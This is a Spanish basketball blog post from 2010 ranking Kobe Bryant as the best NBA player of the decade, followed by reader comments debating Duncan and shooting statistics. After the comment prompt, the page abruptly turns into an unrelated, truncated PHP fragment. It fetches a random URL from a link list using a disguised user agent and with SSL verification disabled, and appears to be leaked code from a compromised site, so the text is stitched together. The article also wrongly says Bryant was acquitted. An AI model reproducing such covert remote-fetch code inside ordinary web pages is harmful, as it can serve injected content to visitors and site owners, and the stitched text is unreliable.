Los 10 mejores de la década: Nº01

15 de November de 2010 por Viva_Dirk
Artículo 10 de 10 de la serie Los mejores de la década

1.- Kobe Bryant

Tienes que haber seguido muy de cerca la carrera de este hombre para saber cuánto le ha costado llegar a este privilegiado lugar y es que si simplemente has estado un poco atento puede que te hayas perdido lo que más te habría gustado y lo que hayas visto no te haya parecido para tanto. Podríamos citar al mítico Vitto Corleone y concluir que  ‘cada hombre tiene su destino’ pero para alcanzar el suyo Kobe ha tenido que pasar por lugares que parecían demasiado alejados de su situación actual. Vamos a repasarlo todo. Tenéis que prestar mucha atención por si se me olvida algo. Empezaremos, como las buenas historias, por el principio.

En la temporada 01/02 los Lakers ganaban su 3er anillo consecutivo con Shaquille O’Neal, MVP de las finales y gran dominador de la liga, como cara visible y Phil Jackson logrando su 9º anillo y confirmándose como uno de los más grandes entrenadores que jamás hubiesen pisado la liga. Kobe Bryant era un consagrado All-Star con 24 años de edad… pero poco más. Había sido escogido como integrante del mejor quinteto de la temporada y del 2º mejor quinteto defensivo pero muchos  comentaban que su mayor mérito era haber elegido a los Lakers en 1996 y haberse encontrado con Shaq y Phil. Las comparaciones con Allen Iverson, Vince Carter, Tracy McGrady o Paul Pierce no dejaban de sucederse y se daba por hecho que cualquiera de ellos habría hecho lo mismo que Bryant o incluso más. Poco parecía importar que este escolta nacido en Philadelphia hubiese promediado 25.7 puntos, 5.9 rebotes, 5 asistencias, 1.5 robos y 1 tapón con un 44.8% en tiros durante los tres Playoffs que habían acabado en anillo, que fuese un defensor muy superior a sus ‘rivales’ y que hubiese resultado más decisivo que el propio O’Neal en no pocos partidos durante esos 3 años. Nada de esto parecían tener en cuenta muchos de los críticos que se referían a Bryant como un jugador egoísta y de carácter difícil.

La fórmula Shaq+Kobe+Jackson había seguido funcionando cada año teniendo los Lakers una plantilla mas débil y la temporada 02/03  no fue una excepción. Fox, Horry y Shaw eran un año más viejos, Fisher cumplía y el resto eran auténticas rémoras que no vale la pena ni recordar. Aun con estos mimbres el equipo ganó 50 partidos, sus 2 figuras fueron de nuevo elegidas en el primer quinteto y Kobe Bryant alcanzaba su mayor cifra anotadora con 30 puntos por noche. A pesar de todo, los San Antonio Spurs no tuvieron excesivos problemas en maniatar a unos Lakers con cada vez menos recursos. Caía el campeón antes de lo esperado. Las lágrimas en el rostro de Derek Fisher eran una señal de enorme decepción. Kobe acababa esos Playoffs con 32 puntos por noche y una tropa de críticos detrás señalándolo como gran responsable del mal funcionamiento del equipo.

A esta plantilla se le sumaron en el verano de 2003 Karl Malone y Gary Payton, con 40 y 35 años respectivamente. La llegada de 2 futuros Hall of Fame a un equipo que había ganado recientemente 3 anillos hacía pensar en un paseo militar para los Lakers aquella temporada. Pero el paseo acabó en un precipicio más grande de lo que pudieran imaginar. La derrota por 4-1 ante los Pistons en la final de la NBA supuso el final de Shaquille en Los Angeles y el adiós temporal de Phil Jackson. Durante el año 2003 Kobe Bryant fue acusado de violación, lo que supuso una bajada de popularidad enorme para él y la suspensión de los contratos con algunas de las marcas que le patrocinaban. Además durante la investigación Kobe manifestó que debería haber actuado como su compañero O’Neal, que pagaba a las mujeres para que se mantuvieran en silencio en situaciones como aquéllas. Estas declaraciones tuvieron una tremenda repercusión mediática y dieron aun más alas a los que le catalogaban como egoísta y mal compañero. Ni qué decir tiene que fue absuelto de todos los cargos. Para aportar más leña al fuego, Phil Jackson escribió que Bryant era un jugador ‘imposible’ de entrenar. De nada sirvieron las palabras de Tex Winter, que salió en defensa de Bryant argumentando que nunca había pasado por alto los sistemas en beneficio de su juego personal. La temporada 03/04 situó a Kobe Bryant en el ojo del huracán, como el principal culpable de las marchas de O’Neal y Jackson a ojos del mundo. De todas maneras, pocas veces tomó la franquicia una decisión tan acertada como la de apostar por el introvertido, egoísta y extremadamente profesional Bryant en lugar del showman, dominador, vago e irresponsable Shaq.

La única temporada en la década que Kobe Bryant no disputó los Playoffs fue la 04/05. Acompañado por Lamar Odom y Caron Butler sólo pudo alcanzar las 31 victorias. La nada más absoluta en el puesto de base y en el juego interior hacían de los Lakers un equipo mediocre y de Bryant un All-Star más, relegado al tercer quinteto de la temporada y alimentando a sus críticos, que veían cómo Shaquille alcanzaba la final de conferencia junto a Dwyane Wade. Para colmo, los Clippers quedaban por delante de los Lakers, algo especialmente doloroso para los aficionados amarillos.

‘Donde dije digo digo Diego’, debió pensar Phil Jackson ante la astronómica oferta del doctor Buss para volver a entrenar a los Lakers. De ‘jugador imposible de entrenar’ Bryant pasó a estrella absoluta, gran entendedor del triangulo y prolongación del maestro Zen en la pista. La temporada 05/06 fue bestial en términos individuales para Kobe Bryant. Sus 35.4 puntos por noche eran una cifra de otra época y en el camino dejó algunas actuaciones memorables y récords de la liga. No podemos pasar por alto la noche del 22 de enero de 2006 en la que, en el Staples Center y contra Toronto Raptors, Kobe Bryant logró la 2ª mejor marca anotadora de todos los tiempos en un partido. Sus 81 puntos no fueron fruto de un partido fácil casi de exhibición sino de un encuentro que los Lakers perdían por 16 y en el que Bryant anotó tiros, bandejas, mates, contra uno, dos y tres defensores cuando hizo falta. Los que lo vimos no podremos olvidarlo jamás. Entraron en Playoffs con 45 victorias y a Kobe se le negó un MVP del que parecía totalmente merecedor. En aquellos Playoffs a punto estuvieron de dar la campanada ante los Suns del MVP Nash, pero después de una (otra) canasta milagrosa de Kobe, los de Arizona remontaron un 3-1 y dejaron a Kobe viendo por la tele cómo Shaq se hacía con su 4º anillo. Esa fue la última vez que vimos al Nº8 de los Lakers.

En la 06/07 vimos nacer al 24, un jugador mucho más maduro que el 8. Fue una temporada mediocre en lo colectivo, con un balance de 42-40 y cayendo nuevamente con Phoenix en primera ronda, pero fue una nueva muestra de que Kobe estaba por encima de las comparaciones que se querían establecer con él. Promedió 31.6 puntos, 5.7 rebotes y 5.4 asistencias con un 46.3% en tiros. Consiguió 65 puntos el 16 de marzo de 2007, su segunda mejor marca personal, y acabó la temporada con diez partidos de 50 o más puntos, algo que sólo había conseguido Wilt Chamberlain muchos años antes. Además, su camiseta resultó ser la más vendida en EEUU y China, lo que demostraba que su imagen estaba completamente restablecida.

La vuelta de Derek Fisher al equipo fue la principal novedad para la campaña 07/08. No era un gran fichaje pero mejoraba infinitamente a Smush Parker. En momentos puntuales de diciembre y enero el equipo lideró la clasificación del Oeste,  gracias en parte a Andrew Bynum, que empezaba a mostrar sus cualidades en la zona hasta que se lesionó gravemente la rodilla. Pero la principal novedad estaba aún por llegar. Antes del cierre del período de traspasos llegó a los Lakers Pau Gasol. La calidad del español estaba fuera de toda duda pero lo realmente sorprendente era lo que los Lakers habían soltado por él: nada de nada. Con Gasol adaptándose rápidamente al equipo, Bryant se alzó con el ansiado MVP y alcanzó su primera final como claro jugador franquicia. No fue la suya esa final y fueron los Celtics los que se llevaron el gato al agua.

En la 08/09, y a pesar de una nueva lesión de Bynum, los Lakers consiguieron un récord de 65-17, alcanzando esta cifra por segunda vez en 20 años. Kobe lideró a un grupo donde sólo Gasol aportaba con regularidad durante la regular y que, una vez en Playoffs, contaba con ayudas puntuales de Fisher (siempre Fisher) y Ariza. La culminación de un largo camino llegaba con el anillo y el MVP de las finales. La era del ‘Kobe no puede ganar sin Shaq’ finalizaba. Sus números en Playoffs fueron como casi siempre superiores a los de la regular, alcanzando el 30-5-5.

Y si el 4º anillo supuso una pequeña revancha contra Shaq y los que decían que sin él era como el resto, el 5º, que llegó en la temporada 09/10, se convirtió en el de la revancha eterna contra el gran enemigo. Kobe se convirtió en el MVP de una final histórica donde remontaron un 3-2 adverso y que acabó con la maldición de los 7ºs partidos entre Lakers y Celtics. A pesar de una mala selección de tiro en el partido decisivo acabó aportando 23 puntos y 15 rebotes. Durante la final sus números fueron de 28.6 puntos, 8 rebotes, 3.9 asistencias y 2.1 robos.

Si comparásemos al Kobe que ganó el anillo en 2001 con el que lo ganó en 2010, veríamos claras muestras de un trabajo casi obsesivo por mejorar. Su mecánica de tiro es perfecta, utiliza las fintas magistralmente, juega al poste como pocos, con menos físico no es peor defensor que nadie y siempre antepone el bien del grupo al propio. No sabemos cuándo ni cómo acabará la carrera de este hombre, pero haberlo disfrutado durante estos 10 años ha sido un privilegio y una auténtica gozada. Además de ser el mejor, es el jugador más fascinante que ha pisado la liga en lo que va de siglo.

Comenta

23 comentarios a esta entrada

  1. nacho dice:
    #1

    “…y siempre antepone el bien del grupo al propio” Sabes que te van a dar palos por esa frase, ¿no? Yo estoy de acuerdo, por sí así te sirvo de escudo, que ya te hemos dado bastantes. Nada más, magnífico artículo, y como dices, el jugador más fascinante a día de hoy.

      Citar

  2. TheDeerHunter dice:
    #2

    Lo primero, mi enhorabuena y mi admiración más absoluta por una gran serie de artículos, que creo serán referencia durante largo tiempo en este blog.
    Lo segundo que estoy completamente de acuerdo conque Kobe es el jugador por excelecia de la primera década de este siglo. Como comentas, no lo ha tenido nada fácil por muchos motivos pero su esfuerzo y ambición han creado, para mí, el jugador más pulido técnicamente y físicamente hablando que haya visto.
    Hay que tener en cuenta que todo ese hambre también le ha pasado factura en términos de popularidad. Su carácter tampoco ha ayudado. En ese sentido me recuerda a Petrovic aquí en Europa.

    Estamos hablando de alguien con el que ya se especula si es el mejor Laker de la historia. Situándole mucha gente ya en un top 10 de todos los tiempos. Lo más fuerte es que hay argumentos que así lo indican… y habrán muchos más si gana más títulos. Son palabras mayores.
    Es el único ser humano hasta la fecha que ha aguantado dignamente la terrible comparación con Michael Jordan que tantos exteriores ha consumido. En mi opinión, Kobe es algo más puro y más completo técnicamente, aunque Jordan fue superior en inteligencia sobre la cancha y también en liderazgo.

    En definitiva. Creo que terminará entrando indiscutiblemente en el top 10. Creo que nos seguirá dando argumentos para compararlo con cualquier grande. El estátus de Baylor, West, Havlicek, Pettit… podrían estar comprometidos por la Mamba negra. No sabría decir si alguno más. Es increíble.

      Citar

  3. Tiago dice:
    #3

    Personalmente, mi número uno es Duncan. Creo que ha sido mas importante en los titulos que Kobe cuando estaba con O’neal.

      Citar

  4. CAMPO2 dice:
    #4

    el prototipo de jugador total, sabe hacer de todo y todo bien

      Citar

  5. CAMPO2 dice:
    #5

    y enhorabuena por los artículos

      Citar

  6. Cocinitas dice:
    #6

    Me han encantado los articulos de esta serie estoy practicamente de acuerdo con casi todas las posiciones. Para mi kobe es el mejor de la decada con muxa diferencia y debe de estar en el top 10 de todos los tiempos sin duda, aparte de michael jordan no he visto a ningun escolta con un nivel de juego superior al suyo tiene una tecnica de tiro PERFECTA y una clase sin igual.

      Citar

  7. scriers dice:
    #7

    Bueno, está ahí ahí. Yo me he interesado por la Nba a fondo… desde principios de Siglo (antes era Jordan y las finals y poco más), y, sinceramente, solo Duncan puede discutir a Kobe. De cualquier manera, el reciclaje de Kobe y su esfuerzo por entender el juego y mejorar es encomiable y merecedor del premio.
    Es cierto que se le ha comparado con muchos jugadores, pero también lo es que siempre o casi siempre ha salido airoso, en comparación con jugadores de parecido nivel individualmente (Carter o McGrady), Kobe se hizo mejor entendedor de las necesidades del grupo y supo rectificarse y dosificarse para dar lo mejor de sí en los momentos importantes (para mí el anillo contra los Orlando de Howard lo gana él y la defensa de Gasol y Ariza), y, aunque es cierto que esta última final anduvo fallón en el tiro, su aportación en otros aspectos fue decisiva. Contra otros jugadores que también entendían bien el juego, Kobe directamente, fue mejor anotador (aquí podemos hablar de Pierce, por ejemplo).
    Y luego hay un aspecto que ninguno ha conseguido igualar: La constancia. Porque es muy, pero muy muy complicado seguir en el candelero con semejantes números y enfrentados a todo tipo de comparaciones. Que le pregunten a otros. Tan complicado que jugadores que parecen estrellas luego en dos temporadas están fuera de juego. Pero Kobe sigue ahí, y estoy seguro, le quedan al menos 3 años más a un nivel de 25 puntos por partido, 5 rebotes, 5 asistencias.
    Y el secreto es la mentalidad que tiene para aprovechar sus recursos físicos y la mentalidad para hacer historia. Kobe quiere ser leyenda de este juego, y ya lo ha conseguido. Pero su hambre le pide más, y más, igualar y superar a Jordan, ser uno de los Lakers más anotadores, conseguir el máximo número en todo. Caiga bien o no, lo de este tío es impresionante.

      Citar

  8. scriers dice:
    #8

    Y joder, ¿dónde está mi educación? Enhorabuena por estos artículos. Me ha gustado que no seáis obvios en la selección del jugador y el firmante del artículo, sino imprevisibles. Llegar a un consenso es difícil. Enhorabuena por ello, por el blog y por ser tan constantes.

      Citar

  9. Txusma dice:
    #9

    La carrera de Kobe es posiblemente la prueba de que ningún jugador es capaz de ganar el anillo él solo. Kobe ha sido y es buenísimo, posiblemente el jugador que más podría poner en duda la anterior formación, pero hasta la llegada de Pau no fue capaz de alzarse con el título. Ni Michael Jordan habría ganado teniendo de mejor compañero a Odom y como jugadores destacados a Luke Walton, Smush Parker o Maurice Evans. Lo increible es que se clasificaran para Playoffs.

      Citar

  10. M dice:
    #10

    Enhorabuena por todos los artículos, también por este, creo que hubiese puesto a Duncan, pero bueno, entiendo que Kobe pueda ser el nº 1 sin problema.

    Ahora, que “siempre antepone el bien del grupo al propio”…hummm, no, no lo creo.

      Citar

  11. LEmontus dice:
    #11

    Como va a ser Duncan mejor que un jugador que para muchos es mejor que jordan y para otros muchos es el único que le puede hacer sombra.

    Para mí el mejor de la historia(Aunque a Jordan no lo vi en su totalidad, pero tampoco me hace falta ver a maradona para saber que messi es el mejor jugador de la historia).

      Citar

  12. Viva_Dirk dice:
    #12

    A ti no te hace falta nunca nada para hacer afirmaciones absurdas.

      Citar

  13. sergio dice:
    #13

    touché….

      Citar

  14. portu dice:
    #14

    Se ha hablado aquí de la constancia, algo q ha hecho destacar a Kobe muy por encima de casi todos los escoltas desde Jordan, año tras año ha jugado al nivel más alto. Este punto es algo q no suele verse cuando estás enfrascado enmedio de una temporada, se ve mejor en este fantástico análisis de una década y realmente hay q valorar mucho a Kobe por ello. Ahora bien, en esta lista de jugadores se ha primado en la mayoría de casos el aspecto colectivo y la repercusión en el juego del equipo y en los logros colectivos… en ese punto Kobe siempre ha pecado de cierto egoismo y sus logros sin Shaq y sin Pau no me parece q hayan sido tan destacados como para colocarlo el nº1, en mi opinión Duncan ha sido más eficaz en ese punto (Ginobili y Parker son muy buenos, pero no creo q nadie pueda compararlos a Shaq y Pau), ha mejorado más a sus compañeros y ha estado más a disposición de las necesidades del equipo.

      Citar

  15. TheDeerHunter dice:
    #15

    Con quien no se pueden comparar Ginobili y Parker son con los Kwane Brown, Devean George y demás chusma que acompañaba a Kobe en los peores momentos. Creo que los Spurs no han sido prácticamente nunca Duncan+Ginobili+Parker. De hecho se han podido permitir el lujo de tener a Ginobili de 6º durante mucho tiempor por algún motivo, que no es otro que han tenido la suerte de disfrutar de un gran equipo casi siempre desde que está Duncan allí.
    Lo del egoísmo de Kobe… siendo Duncan u O’neal grandísimos pasadores y jugadores de equipo ninguno ha distribuido tanto como el escolta ni de lejos. El egoísmo de Kobe no es mucho mayor que el de nadie con el que pudieramos compararle a estos niveles. Es un modelo de juego clavado al del mismísimo Jordan en ese aspecto. Si acaso te admitiría un punto mayor… pero más allá de eso todo es un mito asociado a la manía irracional que mucha gente le tiene.
    En muchos de los momentos más críticos de los éxitos de Kobe él ha demostrado ser más jugador de equipo que la mayoría. A los hechos recientes me remito.

      Citar

  16. Viva_Dirk dice:
    #16

    Claro, Parker y Ginobili no pueden compararse con Shaq y Pau, y es que Kobe nunca ha jugado con Shaq y Pau a la vez. Kobe cada vez que ha podido ha ‘delegado’ bastante en otros compañeros, antes de llegar Pau cuando Bynum empezó a jugar bien era muy habitual ver al equipo buscandolo, sin olvidarte evidentemente de que tienes a uno de los mejores anotadores de la historia en el perímetro.

    El caso de Kwame es aparte, no creo que nadie halla ‘robado’ tantas asistencias jamás, su capacidad de fallar mates y bandejas no se la he visto a nadie.

      Citar

  17. AndiD dice:
    #17

    Enhorabuena a Dirk por la serie de artículos. Coincido con Deer en que se hablará de estos artículos durante mucho tiempor en el blog.
    Y también coincido en que Kobe ha sido el número 1 esta década.
    Si consigues obviar esos días en los que se tira hasta las zapatillas con porcentajes nefastos, la verdad es que es impresionante ver cómo todo un partido puede girar en torno a él.

      Citar

  18. Scriers dice:
    #18

    Hoy he estado pensando. En la posición en la que se desenvuelve Bryant… si aceptamos algunos márgenes de diferencia… ¿Quién ha sido el jugador legendario con mayor % de eficiencia de cara al aro? Me gustaría saber el % para jugadores no estrictamente pivots. ¿Alguien lo sabe? Iluminadme maestros.

      Citar

  19. TheDeerHunter dice:
    #19

    Si no recuerdo mal entre los escoltas estaba George Gervin, y algo más desplazado a la posición de 3 el gran Adrian Dantley. Ambos registraron un promedio superior al 50% en tiro.

      Citar

  20. Viva_Dirk dice:
    #20

    Te dejo una pequeña lista de los mejores guards ilustres en ese aspecto Scriers, la cifra es el porcentaje de tiro del jugador:

    Magic 52, Stockton 51.5, Gervin 51.1, Petrovic 50.6, David Thompson 50.4, Jordan 49.7, Kevin Johnson 49.3, Rolando Blackman 49.3 Frazier 49 y Nash 48.7.

    Unos cuantos son bases que normalmente no tenian como principal cometido anotar, pero que cuando lo hacian eran tremendamente eficaces. Si buscaramos únicamente entre escoltas anotadores los porcentajes bajarían, en el caso concreto de Jordan, sus 2 años en los Wizars y el año que volvió después de un año retirado le bajaron mucho los suyos. A ver si saco un rato y te dejo datos solo de escoltas anotadores, te adelanto que Kobe esta ahora mismo en un 45.5%.

      Citar

  21. Scriers dice:
    #21

    Dios mio, que maquina .Magic, no? Gracias por satisfacer mi curiosidad. Y de pivots como anda la cosa?

      Citar

  22. TheDeerHunter dice:
    #22

    El líder NBA es Shaq con casi un 60% (58,2) y cerca le anda Dwight Howard (57,5)

    Te recomiendo basketballreference si tienes curiosidad de esas estadísticas.

    Consultándola me he dado cuenta que me he dejado antes a Artis Gilmore con un 59.9%

    PD: Y ojito… que Eddie Curry es un top 20 histórico ¡qué pasada!!!!

      Citar

  23. MagicJohnson32 dice:
    #23

    Se me había pasado felicitar a Viva aquí (ya lo hice por otras vías, jeje) por el artículo y por toda la serie de los 10 mejores de la década. Sensacional, tío.

    Para mí Kobe ha supuesto durante muchos años algo por lo que valía la pena perder horas de sueño fuese cual fuese la ocasión y fuese cual fuese el rival. Suponía (y lo sigue suponiendo) la posibilidad permanente de que podías estar a punto de asistir a algo especial, por histórico o simplemente por hermoso. No hablo necesariamente del día de los 81 puntos, o del récord de triples, de los buzzer beaters o los anillos. Hablo también de las pequeñas cosas, de que de pronto nos regalaba un triple con la zurda o una bandeja tras lanzarse la pelota contra el tablero. Hablo de memorables remontadas (recuerdo, por ejemplo, la de 27 puntos con 21 y gamewinner de Kobe en el 4º cuarto contra los Mavs) y de canastas imposibles.

    Qué suerte la nuestra.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>